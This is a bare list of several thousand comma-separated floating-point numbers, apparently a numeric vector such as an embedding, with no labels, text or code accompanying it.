0.011519028805196285, 0.006592365447431803, 0.007259474601596594, 0.0037043208722025156, -0.012720654718577862, -0.010284255258738995, -0.014220614917576313, -0.009148926474153996, 0.015952613204717636, 0.018430447205901146, 0.013706816360354424, 0.005316156428307295, -0.013905705884099007, -0.018645910546183586, -0.0016729525523260236, -0.004905946087092161, -0.010242820717394352, 0.001451273332349956, -0.008137904107570648, 0.005539907142519951, -0.019507765769958496, 0.011096389032900333, -0.0197563786059618, 0.006260882597416639, -0.020038139075040817, -0.008042602799832821, -0.0029792021960020065, -0.0014440221711993217, 0.01641668938100338, 0.014270337298512459, 0.00516698881983757, 0.01980610005557537, -0.0008665169007144868, -0.015844879671931267, 0.014419504441320896, 0.006538499146699905, -0.009961060248315334, 0.00829121470451355, -0.0013797973515465856, -0.02341926470398903, -0.02270657569169998, -0.007914152927696705, -0.0017009214498102665, 0.010383700020611286, -0.019093412905931473, 0.005970834754407406, 0.027314187958836555, 0.015902889892458916, 0.022855743765830994, 0.006671092472970486, 0.0008551221690140665, -0.01296926662325859, -0.001912241685204208, -0.008999759331345558, -0.030280958861112595, 0.008026028983294964, -0.005171132739633322, 0.017634887248277664, -0.010184810496866703, -0.022408241406083107, 0.01132842618972063, -0.0017247467767447233, 0.012173707596957684, 0.008527396246790886, 0.03357921168208122, -0.016458123922348022, 0.012588061392307281, 0.01846359483897686, -0.03841886296868324, -0.023833617568016052, 0.008432094939053059, -0.001189194736070931, 0.017966371029615402, -0.0012565271463245153, 0.011949957348406315, -0.0006624477682635188, -0.0025772792287170887, -0.014046586118638515, 0.012264865450561047, -0.008767721243202686, -0.0028051736298948526, 0.021496662870049477, -0.009811892174184322, 0.010367126204073429, 0.010217959061264992, 0.005477754399180412, -0.007599244359880686, 0.013010702095925808, -0.011726206168532372, -0.00026829392299987376, -0.02229222282767296, 0.0017630744259804487, -0.003078646957874298, -0.008535683155059814, 0.004191186279058456, -0.009803605265915394, 0.004810644779354334, 0.0055067590437829494, -0.009961060248315334, 0.009828466922044754, -0.020866846665740013, 0.023220373317599297, 0.0065509299747645855, -0.01980610005557537, -0.00302685284987092, 0.00557305570691824, 0.02152981236577034, -0.007284335792064667, 0.020651381462812424, -0.01781720295548439, -0.004988817032426596, 0.006845120806246996, 0.02007128670811653, -0.011635048314929008, -0.01146930642426014, -0.014187466353178024, 0.0062525952234864235, -0.015215063467621803, 0.0005868282169103622, -0.00041694327956065536, 0.024513157084584236, 0.006840977352112532, -0.006803685799241066, -0.0015527900541201234, 0.004017157945781946, 0.004197401460260153, 0.005564768332988024, 0.005403170362114906, -0.017585165798664093, -0.013209591619670391, -0.011485881172120571, 0.016076918691396713, -0.013259314000606537, 0.00249648024328053, -0.014576958492398262, -0.01512390561401844, 0.00411867443472147, -0.010922360233962536, -0.014386355876922607, 0.004000583663582802, -0.011775928549468517, 0.0030289245769381523, -0.00034054683055728674, -0.009662725031375885, 0.010532868094742298, -0.0037623303942382336, 0.006600652355700731, -0.006008126772940159, -0.0032070965971797705, -0.017850352451205254, -0.0066047958098351955, 0.02438056468963623, 0.014469226822257042, -0.007147599011659622, 0.010052217170596123, -0.005631064996123314, 0.023502133786678314, -0.027098722755908966, -0.015853168442845345, -0.013400194235146046, -0.00761581864207983, -0.01808238960802555, 0.010135088115930557, 0.0008794654277153313, 0.006700097117573023, -0.013474778272211552, 0.0017527155578136444, -0.003766473848372698, 0.003884564619511366, 0.011833937838673592, 0.00284039368852973, 0.011121249757707119, 0.030164940282702446, 0.015969187021255493, 0.015455388464033604, -0.0096378643065691, -0.023120928555727005, 0.010856063105165958, -0.012679219245910645, -0.0010120585793629289, -0.0055606248788535595, 0.0016947061521932483, -0.021596107631921768, -0.011659909039735794, -0.0023307388182729483, 0.043788883835077286, 0.01399686373770237, 0.0013228238094598055, 0.01937517337501049, -0.00417254026979208, -0.01571228727698326, -0.002066588494926691, 0.0017278543673455715, -0.011162685230374336, 0.009165501222014427, 0.0015838665422052145, -0.019623784348368645, -0.0005863102851435542, 0.000988233252428472, -0.005660069640725851, 0.011104675941169262, -0.03127540647983551, 0.0029709150549024343, 0.028540674597024918, 0.004562032874673605, 0.005958404392004013, 0.004968099296092987, 0.0038141245022416115, -0.013209591619670391, -0.0018718423089012504, -0.0014709552051499486, -0.012206856161355972, 0.00756195280700922, 0.012927831150591373, -0.010275968350470066, 0.0046614776365458965, -0.025225846096873283, -0.01781720295548439, 0.017535442486405373, 0.0038762777112424374, 0.022159628570079803, 0.0033583356998860836, -0.012148846872150898, 0.007234613411128521, 0.010217959061264992, -0.006169724743813276, 0.0038804211653769016, -0.027579372748732567, 0.012065975926816463, 0.012372598052024841, 0.01375653874129057, 0.016027195379137993, -0.010814628563821316, 0.031093092635273933, 0.0165824294090271, -0.025275567546486855, 0.006037131417542696, -0.00044025067472830415, 0.0044915927574038506, 0.007010862231254578, 0.013739963993430138, -0.004789927043020725, 0.019391747191548347, 0.012331162579357624, 0.007528804242610931, -0.028971601277589798, -0.01997184194624424, 0.013557649217545986, -0.022888891398906708, -0.01475098729133606, -0.006803685799241066, 0.021330920979380608, -0.0013704744633287191, 0.019888971000909805, -0.00017765408847481012, -0.00002094427873089444, 0.004578607156872749, -0.0025979969650506973, -0.01696363463997841, 0.015853168442845345, 0.0027699535712599754, 0.022259073331952095, -0.013938854448497295, 0.00761581864207983, 0.007619962096214294, -0.023336393758654594, 0.006418336648494005, 0.01049971953034401, 0.011311852373182774, -0.03266763687133789, 0.013516213744878769, -0.006339609622955322, -0.008258067071437836, -0.006824403069913387, -0.011651622131466866, 0.013781399466097355, -0.00947212241590023, -0.0005386596312746406, -0.0014927086886018515, 0.02406565472483635, 0.0016936701722443104, 0.005577199161052704, 0.020038139075040817, -0.015521684661507607, 0.03609848394989967, 0.007172460202127695, 0.015811732038855553, -0.015173627994954586, -0.027098722755908966, -0.007897579111158848, 0.011262129992246628, -0.004640759900212288, -0.002821747912093997, 0.022474538534879684, 0.0034080580808222294, 0.022922039031982422, -0.010433423332870007, -0.0019412464462220669, -0.021977312862873077, 0.01001078262925148, 0.002465403638780117, 0.007607531733810902, 0.008125473745167255, -0.011378149501979351, 0.01087263785302639, 0.019143134355545044, -0.0009431723156012595, -0.005212567746639252, -0.011228981427848339, 0.017353126779198647, 0.017203960567712784, -0.0032133120112121105, 0.018165260553359985, -0.0002714016009122133, 0.00249648024328053, -0.0027968864887952805, -0.028391506522893906, 0.002707800595089793, 0.008001167327165604, 0.009729022160172462, -0.0031159387435764074, -0.01445265207439661, -0.010516293346881866, 0.004690482281148434, -0.010814628563821316, 0.011933382600545883, -0.010798053815960884, 0.005291295237839222, -0.005974978674203157, 0.007810564711689949, -0.00023656999110244215, 0.007806421257555485, 0.025872236117720604, -0.014833858236670494, 0.013739963993430138, -0.013491352088749409, -0.008950036950409412, -0.01146930642426014, -0.005556481424719095, 0.02287231758236885, 0.018795078620314598, -0.011436158791184425, -0.02562362514436245, 0.0012119841994717717, 0.004545458592474461, -0.001042617135681212, -0.022988336160779, 0.0037581869401037693, -0.00081109709572047, -0.006679379381239414, -0.008349223993718624, -0.003938430454581976, -0.002444686135277152, 0.02605455182492733, -0.010143375024199486, -0.003281680168583989, -0.0015227493131533265, -0.014187466353178024, -0.0001715682737994939, -0.003246460109949112, 0.008842305280268192, -0.015355943702161312, 0.00885887909680605, 0.004657334182411432, 0.0006930063245818019, -0.00394464610144496, -0.011411297135055065, 0.0034639958757907152, 0.0028445373754948378, -0.01375653874129057, 0.008560544811189175, 0.02002156525850296, 0.00732162781059742, -0.007338201627135277, 0.007276048883795738, -0.015347655862569809, -0.006389332003891468, -0.029734011739492416, -0.03580014780163765, -0.008432094939053059, -0.027645669877529144, 0.00486036716029048, -0.00012890280049759895, 0.018314428627490997, -0.0013135008048266172, -0.007793990429490805, 0.015380804426968098, -0.028822435066103935, 0.018596189096570015, -0.004810644779354334, 0.02799372747540474, 0.0014916728250682354, 0.004137320443987846, 0.011949957348406315, -0.007798134349286556, -0.0029874893371015787, -0.013557649217545986, 0.006828546989709139, 0.011593612842261791, -0.03207096457481384, -0.013599083758890629, -0.005341017618775368, 0.005995695944875479, 0.04209832102060318, -0.00655507342889905, -0.0005619670264422894, -0.0017806844552978873, 0.006704240571707487, -0.004901802632957697, 0.0035841583739966154, -0.017634887248277664, 0.007528804242610931, 0.0034639958757907152, -0.009654438123106956, -0.0066047958098351955, 0.013549361377954483, 0.00675396341830492, -0.0025959250051528215, -0.00488522881641984, -0.01770118437707424, 0.00511312298476696, -0.006277456413954496, -0.018977394327521324, -0.009447261691093445, 0.020054712891578674, -0.004910090006887913, 0.007317483890801668, -0.00022582268866244704, 0.009886476211249828, -0.002444686135277152, 0.016002334654331207, 0.02229222282767296, 0.004595180973410606, 0.0033023979049175978, 0.007636536378413439, 0.016159789636731148, 0.01337533351033926, -0.015223350375890732, -0.012322874739766121, 0.0054694670252501965, -0.0021670691203325987, -0.0014036226784810424, 0.01598576083779335, 0.003024781122803688, 0.011635048314929008, 0.014278624206781387, -0.006579934619367123, 0.002440542448312044, 0.020004989579319954, 0.0030413551721721888, 0.007661397568881512, 0.009828466922044754, -0.002409466076642275, 0.008916888386011124, 0.014925015158951283, -0.02174527570605278, -0.009066056460142136, 0.005974978674203157, -0.02557390183210373, -0.003691890276968479, -0.01635867916047573, 0.0038120527751743793, -0.01985582336783409, -0.008386516012251377, 0.009372677654027939, -0.0051296972669661045, 0.0019132776651531458, 0.011701344512403011, 0.00008267648809123784, 0.013623945415019989, 0.017402850091457367, -0.0133504718542099, -0.030645590275526047, 0.018430447205901146, -0.007545378524810076, -0.01678960584104061, 0.01841387338936329, 0.017419423907995224, 0.006637944374233484, -0.008867166005074978, -0.0012575631262734532, -0.0009276340715587139, -0.01593603752553463, -0.004628329537808895, 0.013797974213957787, 0.01512390561401844, 0.007197321392595768, -0.012455468066036701, 0.0015517540741711855, -0.0008095433004200459, 0.04667278751730919, 0.022159628570079803, -0.013342184945940971, 0.006683523301035166, -0.006385188549757004, 0.009057768620550632, 0.003519933670759201, -0.00030688062543049455, -0.02900475077331066, -0.024032507091760635, -0.015405666083097458, 0.0159277506172657, 0.011195833794772625, -0.005142127629369497, 0.009032907895743847, 0.006372757721692324, -0.009372677654027939, -0.0050012473948299885, 0.004669764544814825, -0.001018273876979947, -0.0000901866442291066, -0.006302317604422569, -0.009331242181360722, 0.00788100529462099, 0.006658661644905806, 0.001248240121640265, 0.012670932337641716, 0.0016460195183753967, -0.015894602984189987, 0.009820180013775826, 0.007466651499271393, 0.010856063105165958, 0.0005112087237648666, 0.011684770695865154, -0.0009271161397919059, 0.013872557319700718, -0.019789526239037514, -0.0016791678499430418, 0.0373581163585186, 0.0031221541576087475, -0.009903050027787685, 0.01361565850675106, 0.02389991469681263, -0.00019539360073395073, 0.003571727778762579, 0.00754952197894454, -0.015629416331648827, -0.00401094276458025, 0.02636946178972721, 0.010043930262327194, -0.012612923048436642, 0.012662645429372787, -0.001308321370743215, 0.0031304412987083197, 0.0023701023310422897, -0.01582001894712448, -0.014038299210369587, -0.00039078720146790147, 0.003838985925540328, 0.03812052682042122, 0.0022561552468687296, -0.016706736758351326, -0.0045164539478719234, -0.0262202937155962, -0.0012886396143585443, 0.009662725031375885, 0.011684770695865154, 0.025225846096873283, 0.022573983296751976, 0.019458044320344925, 0.02308778092265129, -0.006820259615778923, 0.0032423166558146477, 0.0028631831519305706, -0.007818851619958878, -0.014353207312524319, 0.0038762777112424374, -0.01836415007710457, 0.006579934619367123, -0.002850752556696534, 0.006546786520630121, -0.014303484931588173, 0.02184472046792507, -0.0007085446268320084, 0.012911257334053516, 0.017784055322408676, -0.016168076545000076, 0.0002641504106577486, 0.00029729868401773274, 0.004495736211538315, 0.0177177581936121, 0.005672500468790531, -0.03530292585492134, 0.003698105691000819, 0.014353207312524319, 0.012273152358829975, -0.013267600908875465, -0.008200056850910187, -0.021397218108177185, -0.025557328015565872, 0.023054633289575577, 0.021016012877225876, 0.007661397568881512, -0.016458123922348022, 0.008154477924108505, 0.018430447205901146, -0.0036939620040357113, -0.00961300265043974, -0.005896251183003187, 0.0021069878712296486, 0.0008950037299655378, -0.004104172345250845, -0.0016139071667566895, 0.028176043182611465, 0.0014398786006495357, -0.007031579967588186, 0.009173788130283356, 0.007387924008071423, -0.0011187546188011765, 0.027330761775374413, 0.024198248982429504, -0.01136157475411892, 0.00799702387303114, 0.007818851619958878, 0.007785703521221876, -0.012090837582945824, -0.01597747392952442, 0.01722053438425064, -0.009240084327757359, 0.000246799347223714, 0.004769209772348404, -0.009173788130283356, 0.006066136062145233, -0.0027471641078591347, 0.00003248467328376137, 0.009695873595774174, 0.0011239340528845787, 0.009215223602950573, -0.0034992159344255924, 0.008875453844666481, 0.002463331911712885, -0.01572057418525219, -0.0036463113501667976, 0.020651381462812424, -0.006169724743813276, -0.030645590275526047, -0.004106244072318077, -0.003569656051695347, 0.008365798741579056, 0.0005314084701240063, -0.012844961136579514, -0.017900073900818825, -0.011717919260263443, 0.0076323929242789745, 0.0068906997330486774, 0.002144279656931758, 0.0007209752220660448, -0.02162925712764263, -0.017402850091457367, -0.006455628667026758, -0.0066420878283679485, 0.0209497157484293, -0.013342184945940971, -0.012778664007782936, 0.013101859949529171, 0.007060584612190723, -0.016192937269806862, 0.004334138240665197, -0.011278703808784485, -0.008618554100394249, 0.015737148001790047, -0.019093412905931473, 0.003606947837397456, -0.025441309437155724, -0.0003138728206977248, -0.001248240121640265, -0.017087941989302635, -0.008253922685980797, 0.010085365734994411, -0.005200137384235859, 0.039910536259412766, -0.005887964274734259, 0.007864430546760559, 0.026982704177498817, -0.0037581869401037693, 0.0005109497578814626, 0.031938374042510986, 0.00015784282004460692, -0.001164333545602858, 0.020982865244150162, 0.004731917753815651, 0.008626841008663177, 0.00586724653840065, 0.00604127487167716, -0.0009079522569663823, -0.011726206168532372, -0.012662645429372787, -0.010425135493278503, 0.010615738108754158, -0.01374825183302164, -0.00002115469214913901, -0.010060505010187626, 0.006998431868851185, -0.016126640141010284, 0.023551857098937035, -0.01022624596953392, -0.010541155003011227, -0.015016173012554646, -0.007470794953405857, -0.02665122225880623, -0.002993704518303275, 0.004574463237076998, -0.012704080902040005, 0.02035304717719555, -0.002413609530776739, -0.007354775909334421, -0.048363350331783295, -0.003196737729012966, -0.025772791355848312, 0.01238088496029377, -0.016557568684220314, -0.002123562153428793, -0.010441710241138935, 0.002554489765316248, -0.01841387338936329, 0.004669764544814825, -0.007197321392595768, -0.021115457639098167, 0.00493909465149045, -0.009629577398300171, 0.0016646654112264514, -0.0030392834451049566, 0.009082630276679993, -0.006157293915748596, -0.004599324427545071, -0.013027275912463665, 0.012314587831497192, -0.009662725031375885, -0.007039867341518402, -0.0028839008882641792, -0.023336393758654594, 0.0017371773719787598, 0.0019619641825556755, -0.00191742111928761, 0.0025503463111817837, -0.004408721812069416, -0.004930807277560234, 0.007922439835965633, 0.0128698218613863, 0.015049321576952934, 0.002962627913802862, 0.004487449303269386, -0.01374825183302164, -0.020369620993733406, 0.0037519715260714293, -0.01620951108634472, 0.0022540835198014975, -0.035501815378665924, -0.007545378524810076, 0.01251347828656435, 0.04252925142645836, 0.005411457736045122, -0.020435918122529984, 0.017999518662691116, 0.005776088684797287, 0.0011135751847177744, -0.0008504607249051332, -0.006683523301035166, -0.001222343067638576, 0.010300830006599426, -0.013657093979418278, -0.020303325727581978, 0.017734332010149956, -0.02126462571322918, 0.015380804426968098, 0.003961219917982817, 0.011419584043323994, -0.01829785294830799, 0.006207016296684742, 0.008494248613715172, 0.006070279981940985, -0.0037312537897378206, -0.00007807974907336757, -0.0026104275602847338, -0.019458044320344925, -0.0062360214069485664, -0.0002399366203462705, -0.009811892174184322, 0.0018221198115497828, -0.017949797213077545, -0.010441710241138935, 0.012820099480450153, 0.010508006438612938, 0.019126560539007187, 0.002266514115035534, 0.028441229835152626, 0.016615578904747963, 0.011933382600545883, -0.005191850010305643, -0.0005692182458005846, -0.013433342799544334, -0.006787111517041922, 0.009811892174184322, 0.021977312862873077, -0.006840977352112532, 0.02588881179690361, 0.0016978137427940965, -0.005241572856903076, 0.005668357014656067, -0.0022230069153010845, 0.01160189975053072, 0.0018977393629029393, 0.01722053438425064, -0.008726285770535469, -0.015281359665095806, 0.00492666382342577, 0.027529651299118996, 0.03273393213748932, -0.0014264121418818831, -0.011983104981482029, 0.015496823936700821, 0.030977072194218636, 0.011543890461325645, 0.022623704746365547, 0.01421232707798481, -0.01932545006275177, 0.0021277056075632572, 0.002175356261432171, -0.01798294484615326, -0.0019412464462220669, 0.014941589906811714, 0.02545788325369358, -0.0011974817607551813, -0.04726945608854294, -0.01186708640307188, 0.03074503503739834, 0.004367286805063486, 0.01727025769650936, -0.0022147197742015123, -0.015057608485221863, 0.0014378068735823035, -0.0192757286131382, 0.005328586790710688, 0.021927591413259506, -0.008701425045728683, 0.005796806421130896, 0.00002285418850078713, -0.011320139281451702, 0.010673748329281807, 0.003948789555579424, -0.015521684661507607, 0.010789766907691956, 0.007445933762937784, 0.017966371029615402, -0.014328346587717533, 0.02088342048227787, 0.0287395641207695, -0.014038299210369587, -0.01361565850675106, 0.0007121702074073255, 0.0022147197742015123, 0.018662484362721443, 0.005394883453845978, 0.010599164292216301, -0.007715263403952122, 0.011684770695865154, 0.020634807646274567, 0.010856063105165958, 0.011320139281451702, 0.012430607341229916, -0.009215223602950573, 0.014601820148527622, 0.010789766907691956, -0.00831607636064291, 0.008999759331345558, 0.004773353226482868, -0.0022810164373368025, 0.0006153150461614132, 0.014875292778015137, -0.001891524065285921, 0.030380403622984886, -0.007980450056493282, 0.007184891030192375, 0.007893435657024384, -0.009869902394711971, -0.011949957348406315, -0.011850511655211449, -0.010864350944757462, -0.0017237107967957854, 0.003403914626687765, -0.007271904963999987, -0.00796387530863285, 0.045612040907144547, -0.006223590578883886, -0.009729022160172462, 0.01642497628927231, -0.01025110762566328, 0.026203719899058342, -0.0034080580808222294, 0.012720654718577862, 0.02643575705587864, 0.028192616999149323, -0.003142871893942356, 0.0016076918691396713, -0.004930807277560234, 0.0008685886859893799, -0.004723630845546722, -0.00680782925337553, 0.007769129239022732, -0.0003439134743530303, -0.004980530124157667, 0.006733245681971312, -0.004533028230071068, -0.013938854448497295, -0.0009431723156012595, 0.014336633495986462, 0.004220190923660994, 0.00493909465149045, -0.017535442486405373, -0.001159154111519456, -0.005846528802067041, -0.009679299779236317, -0.1178090050816536, 0.0011974817607551813, -0.005117266438901424, 0.012165420688688755, -0.02040277048945427, 0.00025521591305732727, 0.006215303670614958, -0.004943238105624914, 0.007160029839724302, -0.00807575136423111, 0.013822834938764572, -0.0009493876132182777, -0.0036939620040357113, -0.0033852686174213886, -0.006845120806246996, -0.004533028230071068, -0.006049562245607376, 0.005904538556933403, 0.017319979146122932, 0.010019069537520409, -0.0021132032852619886, -0.013607371598482132, -0.014328346587717533, -0.009057768620550632, 0.0019650717731565237, 0.017999518662691116, 0.00032967005972750485, 0.00864341575652361, 0.005386596545577049, 0.001629445469006896, -0.02356843091547489, -0.011883660219609737, -0.01533936895430088, 0.008137904107570648, 0.014974738471210003, -0.015190201811492443, 0.0027347335126250982, -0.020038139075040817, 0.007068871986120939, 0.008519109338521957, -0.020982865244150162, 0.012828386388719082, 0.007640679832547903, -0.001421232707798481, 0.0022810164373368025, -0.0349714420735836, -0.0181984081864357, 0.022971762344241142, -0.0007313340320251882, -0.004723630845546722, -0.02691640704870224, -0.01200796663761139, -0.02335296757519245, 0.004247124306857586, 0.0015621129423379898, 0.005303725600242615, 0.023220373317599297, -0.02815946936607361, 0.0063810450956225395, 0.0030600011814385653, -0.009455548599362373, 0.0013207519659772515, -0.008834018371999264, -0.0030102788005024195, 0.0033314027823507786, 0.02229222282767296, 0.00610757153481245, 0.017568591982126236, 0.023435838520526886, 0.008941750042140484, 0.01337533351033926, -0.017518868669867516, 0.01755201816558838, -0.016275808215141296, -0.001483385800383985, -0.002494408516213298, -0.007491512689739466, -0.008618554100394249, 0.007015006151050329, 0.012132272124290466, 0.013681954704225063, -0.010292543098330498, -0.012430607341229916, -0.013052137568593025, -0.02207675762474537, -0.023916488513350487, -0.009687586687505245, 0.014253762550652027, 0.00437143025919795, 0.0064970641396939754, 0.004367286805063486, 0.001967143500223756, -0.00031490871333517134, 0.014734412543475628, 0.00011420620285207406, -0.02260713092982769, -0.006691810209304094, -0.02325352281332016, 0.014850432053208351, 0.02265685237944126, -0.027049001306295395, 0.0015154981520026922, -0.008241492323577404, -0.006575791165232658, 0.004466731566935778, -0.024894362315535545, -0.02007128670811653, -0.0013021060731261969, -0.0002996294351760298, 0.04040776193141937, 0.028225764632225037, 0.0012254506582394242, 0.0011829794384539127, 0.0003804283624049276, 0.0007297802367247641, -0.015190201811492443, 0.011643335223197937, 0.014195753261446953, -0.02045249193906784, -0.01186708640307188, 0.002208504592999816, -0.019690081477165222, -0.0016491272253915668, 0.002291375305503607, 0.014270337298512459, -0.005510902497917414, 0.017104515805840492, 0.01786692626774311, -0.005531620234251022, -0.009753882884979248, -0.003076575230807066, 0.0008385480614379048, 0.000929705798625946, 0.005158701911568642, -0.016010621562600136, -0.02282259427011013, 0.046904824674129486, -0.019739804789423943, -0.006086853798478842, -0.02335296757519245, 0.0011757282773032784, 0.008195913396775723, 0.0011664052726700902, -0.006090997252613306, 0.008659989573061466, -0.022988336160779, -0.01445265207439661, 0.0002262111520394683, 0.0005088779726065695, 0.01786692626774311, 0.0028901160694658756, 0.015148766338825226, -0.008527396246790886, 0.03633052110671997, 0.0119748180732131, 0.003200881415978074, 0.006045418791472912, 0.003778904676437378, -0.006766393780708313, 0.0013570078881457448, -0.0021318490616977215, 0.00754952197894454, -0.012240004725754261, 0.004781640134751797, 0.0014647399075329304, -0.0047774966806173325, 0.010508006438612938, -0.0005832026363350451, -0.005026108585298061, -0.008042602799832821, 0.023021483793854713, 0.011535603553056717, -0.013499638997018337, 0.012041115202009678, 0.019656933844089508, -0.01664043962955475, -0.0001480019127484411, 0.011096389032900333, -0.005407314281910658, 0.0029729867819696665, 0.015803445130586624, 0.0023887483403086662, -0.001421232707798481, -0.02336954139173031, -0.001654306659474969, -0.012430607341229916, -0.0008525324519723654, 0.021944165229797363, -0.004300990141928196, 0.001131185214035213, 0.021281199529767036, 0.012099124491214752, -0.0054818978533148766, -0.01949119195342064, 0.016184650361537933, -0.019955268129706383, -0.0029688433278352022, 0.023866765201091766, 0.010516293346881866, -0.0026601499412208796, 0.006476346403360367, 0.01464325562119484, -0.0070730154402554035, 0.0037975504528731108, 0.0006329250754788518, 0.008900314569473267, -0.01321787852793932, 0.008229061961174011, -0.0033210439141839743, 0.009455548599362373, -0.0015610770788043737, 0.004211904015392065, 0.01450237538665533, -0.028789285570383072, -0.00744179030880332, -0.01813211292028427, -0.006347896531224251, 0.033943843096494675, -0.0019402105826884508, 0.013499638997018337, 0.024463435634970665, -0.002732661785557866, 0.020982865244150162, 0.010400274768471718, 0.01071518287062645, -0.002235437510535121, 0.032004669308662415, 0.01689733937382698, 0.009530131705105305, 0.0004094331234227866, 0.010624025948345661, -0.011030091904103756, 0.015273072756826878, 0.019259154796600342, -0.0018469810020178556, -0.005672500468790531, -0.00674153259024024, -0.0018790934700518847, 0.001075247535482049, -0.005672500468790531, -0.0002126151812262833, 0.007756698876619339, -0.020982865244150162, -0.005589629523456097, -0.02487778849899769, 0.006782968062907457, 0.007905866019427776, 0.021065736189484596, 0.0062525952234864235, -0.03898238390684128, 0.0017465002601966262, 0.0028901160694658756, -0.0028383219614624977, -0.0026580782141536474, -0.012231717817485332, -0.0005536799435503781, -0.010682035237550735, 0.0027098723221570253, 0.009546706452965736, 0.026684369891881943, -0.023336393758654594, 0.0003073985571973026, -0.019656933844089508, -0.003335546236485243, -0.013855983503162861, -0.024082230404019356, 3.601315086143586e-7, -0.031938374042510986, -0.005589629523456097, -0.0036214501596987247, 0.015165341086685658, -0.012032827362418175, -0.004276128951460123, -0.011187545955181122, 0.0012316659558564425, -0.003865918843075633, -0.011046665720641613, -0.004396291449666023, -0.008809156715869904, 0.003103508148342371, -0.027595948427915573, -0.007396211382001638, -0.005904538556933403, 0.003103508148342371, 0.017750907689332962, -0.0050012473948299885, -0.04246295243501663, 0.009298094548285007, -0.0014730269322171807, -0.0044377269223332405, -0.009157214313745499, 0.007160029839724302, 0.009173788130283356, 0.006666949018836021, -0.038253121078014374, -0.0017465002601966262, -0.012041115202009678, 0.009488697163760662, -0.011278703808784485, -0.005908682011067867, -0.018761929124593735, -0.0239496361464262, -0.01668187417089939, -0.0033831968903541565, -0.012206856161355972, -0.01663215272128582, -0.003687746822834015, 0.006878269370645285, -0.008249779231846333, -0.005759514402598143, 0.005055113695561886, -0.03580014780163765, 0.040242020040750504, 0.02303805761039257, 0.0028051736298948526, -0.00435899943113327, 0.009704160504043102, -0.018645910546183586, -0.0071268812753260136, 0.01434492040425539, 0.020203880965709686, -0.007383780553936958, -0.025756217539310455, -0.011535603553056717, 0.01664043962955475, 0.0034349909983575344, 0.012786950916051865, -0.0013725461903959513, -0.00026570423506200314, 0.0239496361464262, 0.016002334654331207, 0.0128698218613863, -0.006820259615778923, -0.013549361377954483, -0.013309036381542683, 0.008535683155059814, -0.013806261122226715, -0.011635048314929008, -0.027844559401273727, -0.00377476098947227, 0.0025462026242166758, 0.019955268129706383, 0.003260962665081024, 0.0011208264622837305, 0.013781399466097355, -0.0087428605183959, 0.0010617810767143965, -0.004334138240665197, 0.015289646573364735, 0.014013437554240227, -0.022259073331952095, 0.00648877676576376, 0.005618634633719921, 0.020386194810271263, -0.00036514908424578607, -0.0021919303108006716, -0.013433342799544334, -0.005042682867497206, -0.002531700301915407, -0.008328506723046303, 0.002291375305503607, -0.025772791355848312, 0.01679789461195469, -0.021115457639098167, 0.0033065415918827057, 0.0029543410055339336, 0.019557489082217216, 0.003522005397826433, 0.008842305280268192, -0.00499296048656106, 0.005295438691973686, -0.010143375024199486, -0.006149007007479668, 0.08048404008150101, -0.0014647399075329304, -0.0013052137801423669, -0.006219447124749422, -0.010582590475678444, 0.030529571697115898, -0.012099124491214752, 0.053368739783763885, 0.00243018358014524, 0.018861373886466026, 0.026634646579623222, -0.01673988439142704, -0.008626841008663177, 0.009563280269503593, 0.030131790786981583, -0.025524180382490158, -0.013557649217545986, -0.013068711385130882, 0.00580094987526536, 0.02900475077331066, 0.013425055891275406, 0.001452309312298894, 0.015157053247094154, -0.010516293346881866, -0.022573983296751976, -0.00732162781059742, 0.008817443624138832, 0.0008732501300983131, -0.003142871893942356, -0.024562880396842957, -0.015463675372302532, 0.011137823574244976, -0.010043930262327194, -0.0055606248788535595, -0.006376901641488075, 0.013018989004194736, 0.005195993930101395, 0.010002494789659977, 0.0032899673096835613, -0.002881829161196947, -0.000815240666270256, 0.0038824928924441338, 0.010193097405135632, -0.01098036952316761, 0.022457962855696678, -0.0061200023628771305, -0.0001038473637891002, 0.008900314569473267, -0.00022452784469351172, -0.017419423907995224, -0.011800789274275303, -0.01755201816558838, 0.01760173961520195, 0.018281279131770134, 0.018115537241101265, 0.010068791918456554, 0.014295198023319244, 0.008071607910096645, 0.01033397763967514, -0.010532868094742298, 0.0003879385185427964, 0.026601498946547508, -0.009845040738582611, 0.012173707596957684, -0.021330920979380608, -0.025822514668107033, -0.002177427988499403, 0.001656378386542201, -0.014270337298512459, -0.005805093329399824, 0.008175196126103401, -0.012181994505226612, 0.008071607910096645, -0.013698529452085495, 0.022109907120466232, 0.018480168655514717, 0.011030091904103756, 0.027678819373250008, -0.00029237824492156506, -0.0028859726153314114, -0.000009768061318027321, 0.018331002444028854, -0.022673428058624268, -0.0032630343921482563, -0.024397138506174088, 0.011378149501979351, -0.000930223788600415, 0.00950527098029852, -0.00048375778715126216, 0.01910998672246933, 0.00810475554317236, -0.002206432865932584, -0.0027678818441927433, -0.007097876630723476, -0.00974559597671032, -0.009240084327757359, 0.0027119440492242575, 0.002006507245823741, 0.008216631598770618, 0.005452893208712339, 0.013367046602070332, 0.004591037519276142, -0.029800308868288994, 0.0014388427371159196, -0.002041727304458618, 0.017237108200788498, 0.014162604697048664, -0.013773112557828426, -0.008800869807600975, -0.016988497227430344, 0.001718531479127705, -0.03074503503739834, 0.01399686373770237, 0.0028051736298948526, -0.008593693375587463, -0.020435918122529984, 0.005291295237839222, 0.003930143546313047, 0.023866765201091766, -0.01345820352435112, 0.023783894255757332, 0.021016012877225876, 0.010375413112342358, 0.002983345650136471, -0.0009789103642106056, 0.022623704746365547, 0.009182075038552284, -0.0015300005907192826, 0.00936439074575901, 0.023717598989605904, -0.024678898975253105, -0.001542431185953319, 0.01397200208157301, 0.015347655862569809, 0.005465323571115732, 0.006990144960582256, -0.004126961342990398, 0.006542643066495657, -0.007085446268320084, 0.009687586687505245, 0.025524180382490158, 0.006124145817011595, -0.005030252505093813, 0.012530052103102207, -0.0002477057569194585, 0.024131951853632927, 0.0117344930768013, -0.00481893215328455, 0.020750826224684715, 0.017469147220253944, -0.00643491093069315, 0.008166909217834473, -0.009861614555120468, 0.00197232305072248, 0.005452893208712339, -0.003372838022187352, -0.0034681393299251795, -0.003277536714449525, 0.016864189878106117, 0.000053509880672208965, -0.014311772771179676, 0.001627373625524342, 0.026568351313471794, 0.0004301508015487343, 0.004715343471616507, -0.012554912827908993, -0.005639351904392242, -0.0003514236304908991, 0.016184650361537933, -0.005452893208712339, 0.0030724317766726017, 0.0031988094560801983, -0.007926584221422672, 0.020253602415323257, 0.00957985408604145, 0.01071518287062645, 0.0011487952433526516, -0.01598576083779335, -0.01636696606874466, -0.006095141172409058, -0.0317394845187664, 0.011137823574244976, 0.007566096261143684, 0.04644074663519859, -0.01509904395788908, -0.002904618624597788, 